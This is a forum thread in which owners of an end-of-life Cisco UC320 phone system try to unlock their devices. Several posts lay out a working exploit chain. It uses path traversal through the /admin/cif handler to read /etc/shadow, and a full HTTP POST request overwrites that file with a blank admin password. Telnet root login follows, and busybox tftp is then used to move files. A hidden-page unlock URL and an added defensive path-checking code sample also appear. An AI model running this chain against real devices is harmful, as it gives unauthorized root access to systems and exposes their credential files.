
UC320 EOL - Unlock?

Paul Williamson
Level 1

Hi,

Does anyone know if there is any chance that CISCO will unlock our boxes after they stop selling/supporting the product?

Regards,

Paul.

29 Replies

You must authorize before it.

I used Fiddler for that.

I can't work out your admin access - I'm missing something, but have you played around with the privilege levels in the config.xml to see if it enables the hidden web pages?

<Privilege_Control>
  <WAN_Internet_Setup>2</WAN_Internet_Setup>
  <WAN_Mobile_Network>2</WAN_Mobile_Network>
  <WAN_Failover_Recovery>2</WAN_Failover_Recovery>
  <LAN_DHCP_Server_Pool_Setting>2</LAN_DHCP_Server_Pool_Setting>
  <LAN_Bridge_VLAN_Setting>2</LAN_Bridge_VLAN_Setting>
  <LAN_Port_Setting>2</LAN_Port_Setting>
  <Wireless_Basic_Settings>2</Wireless_Basic_Settings>
  <Wireless_Protected_Setup>2</Wireless_Protected_Setup>
  <Wireless_MAC_Filter>2</Wireless_MAC_Filter>
  <Wireless_Advanced_Setting>2</Wireless_Advanced_Setting>
  <WMM_Setting>2</WMM_Setting>
  <Loopback_Interface>2</Loopback_Interface>
  <Static_Route_Rule>2</Static_Route_Rule>
  <RIP>2</RIP>
  <Intervlan_Routing>2</Intervlan_Routing>
  <NAT_Setting>2</NAT_Setting>
  <Port_Forwarding>2</Port_Forwarding>
  <Port_Range_Triggering>2</Port_Range_Triggering>
  <QoS_Bandwidth_Control>2</QoS_Bandwidth_Control>
  <QoS_Policy>2</QoS_Policy>
  <QoS_ToS_Control>2</QoS_ToS_Control>
  <QoS_DSTP_Control>2</QoS_DSTP_Control>
  <Firewall_Filter>2</Firewall_Filter>
  <Internet_Access_Control>2</Internet_Access_Control>
  <PPPoE_Relay>2</PPPoE_Relay>
  <DDNS>2</DDNS>
  <DMZ>2</DMZ>
  <IGMP>2</IGMP>
  <UPnP>2</UPnP>
  <CDP>2</CDP>
  <Voice>2</Voice>
  <IKE_Policy>2</IKE_Policy>
  <IPSec_Policy>2</IPSec_Policy>
  <GRE_Tunnel>2</GRE_Tunnel>
  <VPN_Passthrough>2</VPN_Passthrough>
  <Web_Access_Management>0</Web_Access_Management>
  <Remote_Debug>0</Remote_Debug>
  <TR_069>0</TR_069>
  <SNMP>0</SNMP>
  <Local_TFTP>0</Local_TFTP>
  <License_Installation>0</License_Installation>
  <License_Summary>0</License_Summary>
  <License_Detail>0</License_Detail>
  <License_Resend>0</License_Resend>
  <License_Device_Credential>0</License_Device_Credential>
  <Time_Setup>2</Time_Setup>
  <User_List>0</User_List>
  <Log>0</Log>
  <Factory_Defaults>0</Factory_Defaults>
  <Firmware_Upgrade>0</Firmware_Upgrade>
  <Backup_Configuration>0</Backup_Configuration>
  <Restore_Configuration>0</Restore_Configuration>
  <VM_System_Backup>0</VM_System_Backup>
  <VM_System_Restore>0</VM_System_Restore>
  <Reboot>0</Reboot>
  <System_Status>0</System_Status>
  <Switch_Setting>0</Switch_Setting>
  <Voice_Setting>0</Voice_Setting>
  <Ping_Test>2</Ping_Test>
  <Traceroute_Test>2</Traceroute_Test>
  <Detect_Active_LAN_Clients>0</Detect_Active_LAN_Clients>
  <Router_Status>2</Router_Status>
  <Firewall_Status>2</Firewall_Status>
  <Interface_Information>2</Interface_Information>
  <Wireless_Network_status>2</Wireless_Network_status>
  <Wireless_Client_Information>2</Wireless_Client_Information>
  <Mobile_Network_Status>2</Mobile_Network_Status>
  <DHCP_Server_Information>2</DHCP_Server_Information>
  <QoS_Status>2</QoS_Status>
  <Routing_Table>2</Routing_Table>
  <ARP_Table>2</ARP_Table>
  <RIP_Status>2</RIP_Status>
  <IGMP_Status>2</IGMP_Status>
  <VPN_Status>2</VPN_Status>
  <CDP_Neighbor_Information>2</CDP_Neighbor_Information>

At first I tried changing this file, but there was no result.

Maybe this will be interesting for you:

http://192.168.10.1/admin/config.xml

http://192.168.10.1/admin/status.xml

Same files in other paths:

http://192.168.10.1/wizard/status.xml

http://192.168.10.1/usbwizard/status.xml

 

httpd daemon in attachment

Files of ~/www/wizard/

~/www/wizard/AC_OETags.js
~/www/wizard/askfordevmode.html
~/www/wizard/cisco_logo_header.png
~/www/wizard/data
~/www/wizard/framework_3.5.0.12683.swf
~/www/wizard/framework_3.5.0.12683.swz
~/www/wizard/images
~/www/wizard/javascript
~/www/wizard/pageBackground.jpg
~/www/wizard/PhoneBoothHelp.html
~/www/wizard/playerProductInstall.swf
~/www/wizard/sckq4.swf
~/www/wizard/setupwizard.html
~/www/wizard/UC320W_Introduction.swf
~/www/wizard/UC320W_Introduction_de.swf
~/www/wizard/UC320W_Introduction_es.swf
~/www/wizard/UC320W_Introduction_fr.swf
~/www/wizard/UC320W_Introduction_it.swf
~/www/wizard/UC320W_Introduction_pt.swf
~/www/wizard/upgradeApp.js
~/www/wizard/version.txt
~/www/wizard/data/localization
~/www/wizard/data/localization/de_DE.xml
~/www/wizard/data/localization/en_US.xml
~/www/wizard/data/localization/es_ES.xml
~/www/wizard/data/localization/fr_FR.xml
~/www/wizard/data/localization/it_IT.xml
~/www/wizard/data/localization/last_drop
~/www/wizard/data/localization/pt_BR.xml
~/www/wizard/data/localization/pt_PT.xml
~/www/wizard/data/localization/last_drop/.svn
~/www/wizard/data/localization/last_drop/notes
~/www/wizard/data/localization/last_drop/.svn/all-wcprops
~/www/wizard/data/localization/last_drop/.svn/entries
~/www/wizard/data/localization/last_drop/.svn/prop-base
~/www/wizard/data/localization/last_drop/.svn/props
~/www/wizard/data/localization/last_drop/.svn/text-base
~/www/wizard/data/localization/last_drop/.svn/tmp
~/www/wizard/data/localization/last_drop/.svn/text-base/notes.svn-base
~/www/wizard/data/localization/last_drop/.svn/tmp/prop-base
~/www/wizard/data/localization/last_drop/.svn/tmp/props
~/www/wizard/data/localization/last_drop/.svn/tmp/text-base
~/www/wizard/images/systemmap
~/www/wizard/images/systemmap/network
~/www/wizard/images/systemmap/site
~/www/wizard/images/systemmap/telephony
~/www/wizard/images/systemmap/network/Network_LAN2.png
~/www/wizard/images/systemmap/network/Network_PortForwarding2.png
~/www/wizard/images/systemmap/network/Network_Topology2.png
~/www/wizard/images/systemmap/network/Network_WAN2.png
~/www/wizard/images/systemmap/network/Network_Wireless2.png
~/www/wizard/images/systemmap/site/Site_Backup2.png
~/www/wizard/images/systemmap/site/Site_Region2.png
~/www/wizard/images/systemmap/site/Site_SystemAccess2.png
~/www/wizard/images/systemmap/telephony/CallRouting_AutoAttendant2.png
~/www/wizard/images/systemmap/telephony/CallRouting_CallPaging2.png
~/www/wizard/images/systemmap/telephony/CallRouting_HuntGroups2.png
~/www/wizard/images/systemmap/telephony/CallRouting_InboundCalls2.png
~/www/wizard/images/systemmap/telephony/ExtensionButtons_AdditionalExtensions2.png
~/www/wizard/images/systemmap/telephony/ExtensionButtons_SharedExtensions2.png
~/www/wizard/images/systemmap/telephony/ExtensionButtons_SharedFXOLines2.png
~/www/wizard/images/systemmap/telephony/PortsandTrunks_FXSPorts2.png
~/www/wizard/images/systemmap/telephony/PortsandTrunks_LineFXOPorts2.png
~/www/wizard/images/systemmap/telephony/PortsandTrunks_OutboundTrunks2.png
~/www/wizard/images/systemmap/telephony/PortsandTrunks_SIPBRITrunks2.png
~/www/wizard/images/systemmap/telephony/Telephony_DayNightFeatures2.png
~/www/wizard/images/systemmap/telephony/Telephony_Devices2.png
~/www/wizard/images/systemmap/telephony/Telephony_InternalDialing2.png
~/www/wizard/images/systemmap/telephony/Telephony_Music2.png
~/www/wizard/images/systemmap/telephony/Telephony_PBXKeySystem2.png
~/www/wizard/images/systemmap/telephony/UserGroupFeatures_CallForwarding2.png
~/www/wizard/images/systemmap/telephony/UserGroupFeatures_Directory2.png
~/www/wizard/images/systemmap/telephony/UserGroupFeatures_PhoneButtonLabels2.png
~/www/wizard/images/systemmap/telephony/UserGroupFeatures_PhoneButtons2.png
~/www/wizard/images/systemmap/telephony/UserGroupFeatures_VoicemailtoEmail2.png
~/www/wizard/images/systemmap/telephony/UsersPhones_AssignPhones2.png
~/www/wizard/images/systemmap/telephony/UsersPhones_Users2.png
~/www/wizard/javascript/ajaxfileupload.js
~/www/wizard/javascript/bgstretcher.css
~/www/wizard/javascript/bgstretcher.js
~/www/wizard/javascript/images
~/www/wizard/javascript/jquery-ui.custom.css
~/www/wizard/javascript/jquery-ui.js
~/www/wizard/javascript/jquery.js
~/www/wizard/javascript/upgrade_firmware
~/www/wizard/javascript/images/ui-bg_flat_0_aaaaaa_40x100.png
~/www/wizard/javascript/images/ui-bg_flat_75_ffffff_40x100.png
~/www/wizard/javascript/images/ui-bg_glass_55_fbf9ee_1x400.png
~/www/wizard/javascript/images/ui-bg_glass_65_ffffff_1x400.png
~/www/wizard/javascript/images/ui-bg_glass_75_dadada_1x400.png
~/www/wizard/javascript/images/ui-bg_glass_75_e6e6e6_1x400.png
~/www/wizard/javascript/images/ui-bg_glass_95_fef1ec_1x400.png
~/www/wizard/javascript/images/ui-bg_highlight-soft_75_cccccc_1x100.png
~/www/wizard/javascript/images/ui-icons_222222_256x240.png
~/www/wizard/javascript/images/ui-icons_2e83ff_256x240.png
~/www/wizard/javascript/images/ui-icons_454545_256x240.png
~/www/wizard/javascript/images/ui-icons_888888_256x240.png
~/www/wizard/javascript/images/ui-icons_cd0a0a_256x240.png
~/www/wizard/javascript/upgrade_firmware/locale_de_de.js
~/www/wizard/javascript/upgrade_firmware/locale_en_us.js
~/www/wizard/javascript/upgrade_firmware/locale_es_es.js
~/www/wizard/javascript/upgrade_firmware/locale_fr_fr.js
~/www/wizard/javascript/upgrade_firmware/locale_it_it.js
~/www/wizard/javascript/upgrade_firmware/locale_pt_br.js
~/www/wizard/javascript/upgrade_firmware/locale_pt_pt.js
~/www/wizard/javascript/upgrade_firmware/main.js
~/www/wizard/javascript/upgrade_firmware/styles.css

All files accessible via http, for example:

http://192.168.10.1/wizard/javascript/upgrade_firmware/styles.css

How did you use Fiddler? Using the Composer I sent

POST http://192.168.10.1/admin/cif?file=/../../etc/shadow&xuser=admin&xpassword=123456789 HTTP/1.1
Accept: */*
Referer: http://192.168.10.1/admin/cif?file=/../../etc/shadow
Content-Type: application/x-www-form-urlencoded
Content-Length: 59
Host: 192.168.10.1
DNT: 1
Connection: Keep-Alive
Pragma: no-cache
Cookie: dev_disable_warning=true; dev_mode=Integration

admin::0:0:99999:7:::

 

but it keeps coming back; it's blanked out the shadow file

First you must log on to the web GUI with any browser. Then take Fiddler and go to:

"Composer" tab -> "Parsed" tab:

POST — http://192.168.10.1/admin/cif?file=/../../etc/shadow

or, if you have not logged in before (LOGIN is your login and PASSWORD is your password):

http://192.168.10.1/admin/cif?file=../../etc/shadow&xuser=LOGIN&xpassword=PASSWORD

Request body:

admin::0:0:99999:7:::

 

Execute

OK, got it. I was putting admin::0:0:99999:7::: in the wrong area.

Fiddler required RTFM? :)

You can use PASSWD over telnet to set a new password.

P.S. After rebooting your device, the password will be set to factory default.

P.P.S. By default, web admin is accessible only from the LAN network and blocked from WAN & WiFi.

These files are located in ~/www/, but are not accessible from the httpd server.

*It's the web admin of the SRP520 series.

I decided to share achievements, still on the Cisco S & B shit a long time, I think they should pay special attention. Sources with them, asking several times, but they stupidly silent.

 

I am too lazy to translate into English, otherwise I would not have tweeted yet. Those who need to will understand.

 

What is available via httpd:

http://192.168.10.1/askfordevmode.html

http://192.168.10.1/wizard/askfordevmode.html

 

Only after login:

http://192.168.10.1/admin/voice/

http://192.168.10.1/admin/cif

 

Now the fun part. The cif process is launched with root privileges and can work with the file system. This makes it possible to obtain a directory listing, read files, and even write them.

Queries are as follows:

http://192.168.10.1/admin/cif?dir= - will give the entire contents of the directory ~/home/usb_disk

 

http://192.168.10.1/admin/cif?file=pb_db.txt - likewise, as text, we get the entire contents of the file ~/home/usb_disk/pb_db.txt

 

Now a question: what prevents us from getting the contents of the shadow file? Nothing!

 

http://192.168.10.1/admin/cif?file=/../../etc/shadow

 

The list with the salt we already have. The password for the admin account is generated and written every time the device starts, which is a bit inconvenient. The salt is always the same, so the password is always the same. It is created based on the MAC address of the device, but the principle is unknown to me. On the other hand, nothing stops us from resetting it, although this has to be done after every restart.

 

Create a query with the contents:

 

admin::0:0:99999:7:::

 

And send it by the POST method over HTTP to the link above. Then take telnet and connect, entering the user name admin; it will not ask for a password.

 

Then, using busybox, or rather its tar and tftp wrappers, you can quickly download and upload files to the device.

 

The entire configuration is stored in XML. I will describe where things are:

 

~/home/usb_disk/cfg/misc/dynamicconfig.xml — options flash wizard

~/home/usb_disk/cfg/locales/ — region packs in XML and dictionaries for IP phones

 

~/home/usb_disk/tftproot/ — folder from which IP phones receive information about the firmware. These files are the first ones the IP phones load, after they receive the address of the TFTP server via DHCP

 

~/home/usb_disk/cfg/firmware/ - directory with phone firmware

 

This is the most important; I see no sense in describing the rest, you will figure it out on your own.

 

If someone digs into httpd, note that on startup it mounts the container ~/home/usb_disk/wz.fs with read-only access at the directory ~/www/wizard/

 

If you have any other findings, please do not forget to share them with others.

 

P.S. If anyone is able to, build SSH for it for more convenient access via SFTP; all auxiliary components are already there. I have not gotten around to it yet.
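
Added example, not part of the original thread and not Cisco's code: the `file=/../../etc/shadow` requests above succeed because the query value reaches the file system without being confined to the served directory. A sketch of the check such a handler needs, assuming the base directory is `/home/usb_disk`; `resolve_confined`, `audit` and `PathRejected` are hypothetical names and the sample values are constructed.

```python
import os
from urllib.parse import unquote

# Assumption: the directory the thread says un-traversed requests resolve to.
BASE_DIR = "/home/usb_disk"


class PathRejected(ValueError):
    """The requested name resolves outside the served directory."""


def resolve_confined(raw_value, base_dir=BASE_DIR):
    """Turn a raw `file=`/`dir=` query value into a path inside base_dir.

    Raises PathRejected instead of returning anything outside base_dir.
    """
    name = unquote(raw_value)            # decode exactly once
    if "\x00" in name:
        raise PathRejected("NUL byte in name")
    base = os.path.realpath(base_dir)
    # Strip leading slashes: os.path.join() drops `base` entirely when the
    # second argument is absolute, e.g. "/../../etc/shadow".
    joined = os.path.join(base, name.lstrip("/"))
    # realpath() collapses ".." and follows symlinks, so a link placed inside
    # the directory cannot be used to step out of it either.
    resolved = os.path.realpath(joined)
    if resolved != base and not resolved.startswith(base + os.sep):
        raise PathRejected(f"{raw_value!r} resolves to {resolved!r}")
    return resolved


def audit(values, base_dir=BASE_DIR):
    """Return {raw_value: 'allow' | 'deny'} for a batch of query values."""
    verdicts = {}
    for value in values:
        try:
            resolve_confined(value, base_dir)
            verdicts[value] = "allow"
        except PathRejected:
            verdicts[value] = "deny"
    return verdicts


# Constructed sample values, modelled on the requests quoted in the thread.
SAMPLES = ["", "pb_db.txt", "cfg/misc/dynamicconfig.xml",
           "/../../etc/shadow", "../../etc/shadow",
           "%2e%2e/%2e%2e/etc/shadow", "cfg/../../../etc/shadow"]

if __name__ == "__main__":
    for value, verdict in audit(SAMPLES).items():
        print(f"{verdict:5}  file={value}")
```

The check only confines the path; the thread's other observation, that the handler runs as root, is a separate problem that a path check does not address.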

 

 

 

You can request the source code directly from cisco - if you are interested.

That'll only be the FOSS stuff, unlikely to be that interesting. Just the usual kernel and busybox stuff. It is trivial to get shell access though, loads of injection potential in the web interface (including R/W access to the filesystem through a nice API!)

Yes, I had a look through it a couple of years ago, and there wasn't anything that would help unlock the device.

mdube
Level 1

The best I can give is this :

 

Go to :

http://IPOFYOURDEVICE/access/cf12cbd16 

I don't know if that code is unique though.

In my case, this opens a page where it says

OK (200)

Advanced Pages Unlocked

 

Then you go on http://IPOFYOURDEVICE/voice.asp

 

To turn off advanced pages : http://IPOFYOURDEVICE/access/OFF

Thanks, but it doesn't work on mine. 404 error.

Doesn't work for me. Anyway, thank you very much.